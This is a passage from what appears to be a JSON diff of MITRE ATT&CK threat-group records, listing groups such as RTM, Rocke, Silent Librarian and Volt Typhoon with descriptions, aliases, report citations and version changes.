(Citation: Kaspersky Poseidon Group)", + "aliases": [ + "Poseidon Group" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0033", + "external_id": "G0033" + }, + { + "source_name": "Poseidon Group", + "description": "(Citation: Kaspersky Poseidon Group)" + }, + { + "source_name": "Kaspersky Poseidon Group", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2016, February 9). Poseidon Group: a Targeted Attack Boutique specializing in global cyber-espionage. Retrieved March 16, 2016.", + "url": "https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:33.223000+00:00\", \"old_value\": \"2025-04-16 20:37:39.948000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--c416b28c-103b-4df1-909e-78089a7e0e5f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:10.206000+00:00", + "modified": "2025-04-25 14:49:01.288000+00:00", + "name": "RTM", + "description": "[RTM](https://attack.mitre.org/groups/G0048) is a cybercriminal group that has been active since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries. The group uses a Trojan by the same name ([RTM](https://attack.mitre.org/software/S0148)). 
(Citation: ESET RTM Feb 2017)", + "aliases": [ + "RTM" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0048", + "external_id": "G0048" + }, + { + "source_name": "RTM", + "description": "(Citation: ESET RTM Feb 2017)" + }, + { + "source_name": "ESET RTM Feb 2017", + "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Oleg Skulkin, Group-IB" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:01.288000+00:00\", \"old_value\": \"2025-04-16 20:37:34.877000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-26 14:20:20.623000+00:00", + "modified": "2025-04-25 14:49:08.821000+00:00", + "name": "Rocke", + "description": "[Rocke](https://attack.mitre.org/groups/G0106) is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name [Rocke](https://attack.mitre.org/groups/G0106) comes from the email address \"rocke@live.cn\" used to create the wallet which held collected cryptocurrency. 
Researchers have detected overlaps between [Rocke](https://attack.mitre.org/groups/G0106) and the Iron Cybercrime Group, though this attribution has not been confirmed.(Citation: Talos Rocke August 2018)", + "aliases": [ + "Rocke" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0106", + "external_id": "G0106" + }, + { + "source_name": "Talos Rocke August 2018", + "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020.", + "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:08.821000+00:00\", \"old_value\": \"2025-04-16 20:37:36.004000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--c5574ca0-d5a4-490a-b207-e4658e5fd1d7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:00.677000+00:00", + "modified": "2025-04-25 14:49:45.222000+00:00", + "name": "Scarlet Mimic", + "description": "[Scarlet Mimic](https://attack.mitre.org/groups/G0029) is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group's motivations appear to overlap with those of the Chinese government. 
While there is some overlap between IP addresses used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029) and [Putter Panda](https://attack.mitre.org/groups/G0024), it has not been concluded that the groups are the same. (Citation: Scarlet Mimic Jan 2016)", + "aliases": [ + "Scarlet Mimic" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0029", + "external_id": "G0029" + }, + { + "source_name": "Scarlet Mimic", + "description": "(Citation: Scarlet Mimic Jan 2016)" + }, + { + "source_name": "Scarlet Mimic Jan 2016", + "description": "Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:45.222000+00:00\", \"old_value\": \"2025-04-16 20:37:41.499000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--90784c1e-4aba-40eb-9adf-7556235e6384", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-02-03 16:36:38.145000+00:00", + "modified": "2025-04-25 14:49:29.613000+00:00", + "name": "Silent Librarian", + "description": "[Silent Librarian](https://attack.mitre.org/groups/G0122) is a group that has targeted research and proprietary data at universities, government agencies, and private 
sector companies worldwide since at least 2013. Members of [Silent Librarian](https://attack.mitre.org/groups/G0122) are known to have been affiliated with the Iran-based Mabna Institute which has conducted cyber intrusions at the behest of the government of Iran, specifically the Islamic Revolutionary Guard Corps (IRGC).(Citation: DOJ Iran Indictments March 2018)(Citation: Phish Labs Silent Librarian)(Citation: Malwarebytes Silent Librarian October 2020)", + "aliases": [ + "Silent Librarian", + "TA407", + "COBALT DICKENS" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0122", + "external_id": "G0122" + }, + { + "source_name": "TA407", + "description": "(Citation: Proofpoint TA407 September 2019)(Citation: Malwarebytes Silent Librarian October 2020)" + }, + { + "source_name": "COBALT DICKENS", + "description": "(Citation: Secureworks COBALT DICKENS August 2018)(Citation: Secureworks COBALT DICKENS September 2019)(Citation: Proofpoint TA407 September 2019)(Citation: Malwarebytes Silent Librarian October 2020)" + }, + { + "source_name": "DOJ Iran Indictments March 2018", + "description": "DOJ. (2018, March 23). U.S. v. Rafatnejad et al . Retrieved February 3, 2021.", + "url": "https://www.justice.gov/usao-sdny/press-release/file/1045781/download" + }, + { + "source_name": "Phish Labs Silent Librarian", + "description": "Hassold, Crane. (2018, March 26). Silent Librarian: More to the Story of the Iranian Mabna Institute Indictment. Retrieved February 3, 2021.", + "url": "https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment" + }, + { + "source_name": "Malwarebytes Silent Librarian October 2020", + "description": "Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. 
Retrieved February 3, 2021.", + "url": "https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/" + }, + { + "source_name": "Proofpoint TA407 September 2019", + "description": "Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.", + "url": "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian" + }, + { + "source_name": "Secureworks COBALT DICKENS August 2018", + "description": "Counter Threat Unit Research Team. (2018, August 24). Back to School: COBALT DICKENS Targets Universities. Retrieved February 3, 2021.", + "url": "https://www.secureworks.com/blog/back-to-school-cobalt-dickens-targets-universities" + }, + { + "source_name": "Secureworks COBALT DICKENS September 2019", + "description": "Counter Threat Unit Research Team. (2019, September 11). COBALT DICKENS Goes Back to School\u2026Again. Retrieved February 3, 2021.", + "url": "https://www.secureworks.com/blog/cobalt-dickens-goes-back-to-school-again" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:29.613000+00:00\", \"old_value\": \"2025-04-16 20:37:39.188000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--d1acfbb3-647b-4723-9154-800ec119006e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:49:21.603000+00:00", + "name": "Sowbug", + "description": 
"[Sowbug](https://attack.mitre.org/groups/G0054) is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia, particularly government entities, since at least 2015. (Citation: Symantec Sowbug Nov 2017)", + "aliases": [ + "Sowbug" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0054", + "external_id": "G0054" + }, + { + "source_name": "Sowbug", + "description": "(Citation: Symantec Sowbug Nov 2017)" + }, + { + "source_name": "Symantec Sowbug Nov 2017", + "description": "Symantec Security Response. (2017, November 7). Sowbug: Cyber espionage group targets South American and Southeast Asian governments. Retrieved November 16, 2017.", + "url": "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Alan Neville, @abnev" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:21.603000+00:00\", \"old_value\": \"2025-04-16 20:37:37.765000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--894aab42-3371-47b1-8859-a4a074c804c8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:06.390000+00:00", + "modified": "2025-04-25 14:49:04.710000+00:00", + "name": "Stealth Falcon", + "description": "[Stealth Falcon](https://attack.mitre.org/groups/G0038) is a threat group that has conducted targeted spyware 
attacks against Emirati journalists, activists, and dissidents since at least 2012. Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates (UAE) government, but that has not been confirmed. (Citation: Citizen Lab Stealth Falcon May 2016)", + "aliases": [ + "Stealth Falcon" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0038", + "external_id": "G0038" + }, + { + "source_name": "Stealth Falcon", + "description": "(Citation: Citizen Lab Stealth Falcon May 2016)" + }, + { + "source_name": "Citizen Lab Stealth Falcon May 2016", + "description": "Marczak, B. and Scott-Railton, J.. (2016, May 29). Keep Calm and (Don\u2019t) Enable Macros: A New Threat Actor Targets UAE Dissidents. Retrieved June 8, 2016.", + "url": "https://citizenlab.org/2016/05/stealth-falcon/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:04.710000+00:00\", \"old_value\": \"2025-04-16 20:37:35.038000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--277d2f87-2ae5-4730-a3aa-50c1fdff9656", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:07.541000+00:00", + "modified": "2025-04-25 14:49:43.099000+00:00", + "name": "Strider", + "description": "[Strider](https://attack.mitre.org/groups/G0041) is a threat group that has been active since at least 2011 and has targeted victims in Russia, China, Sweden, Belgium, Iran, and 
Rwanda.(Citation: Symantec Strider Blog)(Citation: Kaspersky ProjectSauron Blog)", + "aliases": [ + "Strider", + "ProjectSauron" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0041", + "external_id": "G0041" + }, + { + "source_name": "Strider", + "description": "(Citation: Symantec Strider Blog) (Citation: Kaspersky ProjectSauron Blog)" + }, + { + "source_name": "ProjectSauron", + "description": "ProjectSauron is used to refer both to the threat group also known as G0041 as well as the malware platform also known as S0125. (Citation: Kaspersky ProjectSauron Blog) (Citation: Kaspersky ProjectSauron Full Report)" + }, + { + "source_name": "Symantec Strider Blog", + "description": "Symantec Security Response. (2016, August 7). Strider: Cyberespionage group turns eye of Sauron on targets. Retrieved August 17, 2016.", + "url": "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets" + }, + { + "source_name": "Kaspersky ProjectSauron Blog", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, August 8). ProjectSauron: top level cyber-espionage platform covertly extracts encrypted government comms. Retrieved August 17, 2016.", + "url": "https://securelist.com/faq-the-projectsauron-apt/75533/" + }, + { + "source_name": "Kaspersky ProjectSauron Full Report", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. 
Retrieved August 17, 2016.", + "url": "https://securelist.com/files/2016/07/The-ProjectSauron-APT_research_KL.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:43.099000+00:00\", \"old_value\": \"2025-04-16 20:37:41.346000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--62a64fd3-aaf7-4d09-a375-d6f8bb118481", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:49:19.743000+00:00", + "name": "TA459", + "description": "[TA459](https://attack.mitre.org/groups/G0062) is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. (Citation: Proofpoint TA459 April 2017)", + "aliases": [ + "TA459" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0062", + "external_id": "G0062" + }, + { + "source_name": "TA459", + "description": "(Citation: Proofpoint TA459 April 2017)" + }, + { + "source_name": "Proofpoint TA459 April 2017", + "description": "Axel F. (2017, April 27). APT Targets Financial Analysts with CVE-2017-0199. 
Retrieved February 15, 2018.", + "url": "https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Valerii Marchuk, Cybersecurity Help s.r.o." + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:19.743000+00:00\", \"old_value\": \"2025-04-16 20:37:37.273000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--6688d679-ccdb-4f12-abf6-c7545dd767a4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-05-02 00:08:18.314000+00:00", + "modified": "2025-04-25 14:49:32.865000+00:00", + "name": "The White Company", + "description": "[The White Company](https://attack.mitre.org/groups/G0089) is a likely state-sponsored threat actor with advanced capabilities. From 2017 through 2018, the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan.(Citation: Cylance Shaheen Nov 2018)", + "aliases": [ + "The White Company" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0089", + "external_id": "G0089" + }, + { + "source_name": "Cylance Shaheen Nov 2018", + "description": "Livelli, K, et al. (2018, November 12). Operation Shaheen. 
Retrieved May 1, 2019.", + "url": "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf?_ga=2.161661948.1943296560.1555683782-1066572390.1555511517" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:32.865000+00:00\", \"old_value\": \"2025-04-16 20:37:39.790000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--d519164e-f5fa-4b8c-a1fb-cf0172ad0983", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:59.120000+00:00", + "modified": "2025-04-25 14:49:05.962000+00:00", + "name": "Threat Group-1314", + "description": "[Threat Group-1314](https://attack.mitre.org/groups/G0028) is an unattributed threat group that has used compromised credentials to log into a victim's remote access infrastructure. (Citation: Dell TG-1314)", + "aliases": [ + "Threat Group-1314", + "TG-1314" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0028", + "external_id": "G0028" + }, + { + "source_name": "Threat Group-1314", + "description": "(Citation: Dell TG-1314)" + }, + { + "source_name": "TG-1314", + "description": "(Citation: Dell TG-1314)" + }, + { + "source_name": "Dell TG-1314", + "description": "Dell SecureWorks Counter Threat Unit Special Operations Team. (2015, May 28). Living off the Land. 
Retrieved January 26, 2016.", + "url": "http://www.secureworks.com/resources/blog/living-off-the-land/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:05.962000+00:00\", \"old_value\": \"2025-04-16 20:37:35.353000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--d69e568e-9ac8-4c08-b32c-d93b43ba9172", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:49:36.307000+00:00", + "name": "Thrip", + "description": "[Thrip](https://attack.mitre.org/groups/G0076) is an espionage group that has targeted satellite communications, telecoms, and defense contractor companies in the U.S. and Southeast Asia. The group uses custom malware as well as \"living off the land\" techniques. (Citation: Symantec Thrip June 2018)", + "aliases": [ + "Thrip" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0076", + "external_id": "G0076" + }, + { + "source_name": "Thrip", + "description": "(Citation: Symantec Thrip June 2018)" + }, + { + "source_name": "Symantec Thrip June 2018", + "description": "Security Response Attack Investigation Team. (2018, June 19). Thrip: Espionage Group Hits Satellite, Telecoms, and Defense Companies. 
Retrieved July 10, 2018.", + "url": "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:36.307000+00:00\", \"old_value\": \"2025-04-16 20:37:40.404000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--174279b4-399f-4ddb-966e-5efedd1dd5f2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2023-07-27 20:35:46.206000+00:00", + "modified": "2025-04-30 13:27:45.018000+00:00", + "name": "Volt Typhoon", + "description": "[Volt Typhoon](https://attack.mitre.org/groups/G1017) is a People's Republic of China (PRC) state-sponsored actor that has been active since at least 2021 primarily targeting critical infrastructure organizations in the US and its territories including Guam. [Volt Typhoon](https://attack.mitre.org/groups/G1017)'s targeting and pattern of behavior have been assessed as pre-positioning to enable lateral movement to operational technology (OT) assets for potential destructive or disruptive attacks. 
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has emphasized stealth in operations using web shells, living-off-the-land (LOTL) binaries, hands on keyboard activities, and stolen credentials.(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)(Citation: Microsoft Volt Typhoon May 2023)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)", + "aliases": [ + "Volt Typhoon", + "BRONZE SILHOUETTE", + "Vanguard Panda", + "DEV-0391", + "UNC3236", + "Voltzite", + "Insidious Taurus" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1017", + "external_id": "G1017" + }, + { + "source_name": "Vanguard Panda", + "description": "(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)" + }, + { + "source_name": "DEV-0391", + "description": "(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)" + }, + { + "source_name": "UNC3236", + "description": "(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)" + }, + { + "source_name": "Voltzite", + "description": "(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)" + }, + { + "source_name": "Insidious Taurus", + "description": "(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)" + }, + { + "source_name": "BRONZE SILHOUETTE", + "description": "(Citation: Secureworks BRONZE SILHOUETTE May 2023)(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)" + }, + { + "source_name": "CISA AA24-038A PRC Critical Infrastructure February 2024", + "description": "CISA et al.. (2024, February 7). PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure. 
Retrieved May 15, 2024.", + "url": "https://www.cisa.gov/sites/default/files/2024-03/aa24-038a_csa_prc_state_sponsored_actors_compromise_us_critical_infrastructure_3.pdf" + }, + { + "source_name": "Secureworks BRONZE SILHOUETTE May 2023", + "description": "Counter Threat Unit Research Team. (2023, May 24). Chinese Cyberespionage Group BRONZE SILHOUETTE Targets U.S. Government and Defense Organizations. Retrieved July 27, 2023.", + "url": "https://www.secureworks.com/blog/chinese-cyberespionage-group-bronze-silhouette-targets-us-government-and-defense-organizations" + }, + { + "source_name": "Microsoft Volt Typhoon May 2023", + "description": "Microsoft Threat Intelligence. (2023, May 24). Volt Typhoon targets US critical infrastructure with living-off-the-land techniques. Retrieved July 27, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/" + }, + { + "source_name": "Joint Cybersecurity Advisory Volt Typhoon June 2023", + "description": "NSA et al. (2023, May 24). People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection. 
Retrieved July 27, 2023.", + "url": "https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Ai Kimura, NEC Corporation", + "Manikantan Srinivasan, NEC Corporation India", + "Phyo Paing Htun (ChiLai), I-Secure Co.,Ltd", + "Pooja Natarajan, NEC Corporation India", + "Vlad Shumaher, Palo Alto Networks" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "2.0", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-30 13:27:45.018000+00:00\", \"old_value\": \"2024-05-21 20:12:20.029000+00:00\"}}, \"iterable_item_added\": {\"root['x_mitre_contributors'][4]\": \"Vlad Shumaher, Palo Alto Networks\"}}", + "previous_version": "2.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--4e868dad-682d-4897-b8df-2dc98f46c68a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-02-10 19:57:38.042000+00:00", + "modified": "2025-04-25 14:49:09.909000+00:00", + "name": "Windigo", + "description": "The [Windigo](https://attack.mitre.org/groups/G0124) group has been operating since at least 2011, compromising thousands of Linux and Unix servers using the [Ebury](https://attack.mitre.org/software/S0377) SSH backdoor to create a spam botnet. 
Despite law enforcement intervention against the creators, [Windigo](https://attack.mitre.org/groups/G0124) operators continued updating [Ebury](https://attack.mitre.org/software/S0377) through 2019.(Citation: ESET Windigo Mar 2014)(Citation: CERN Windigo June 2019)", + "aliases": [ + "Windigo" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0124", + "external_id": "G0124" + }, + { + "source_name": "ESET Windigo Mar 2014", + "description": "Bilodeau, O., Bureau, M., Calvet, J., Dorais-Joncas, A., L\u00e9veill\u00e9, M., Vanheuverzwijn, B. (2014, March 18). Operation Windigo \u2013 the vivisection of a large Linux server\u2011side credential\u2011stealing malware campaign. Retrieved February 10, 2021.", + "url": "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/" + }, + { + "source_name": "CERN Windigo June 2019", + "description": "CERN. (2019, June 4). 2019/06/04 Advisory: Windigo attacks. 
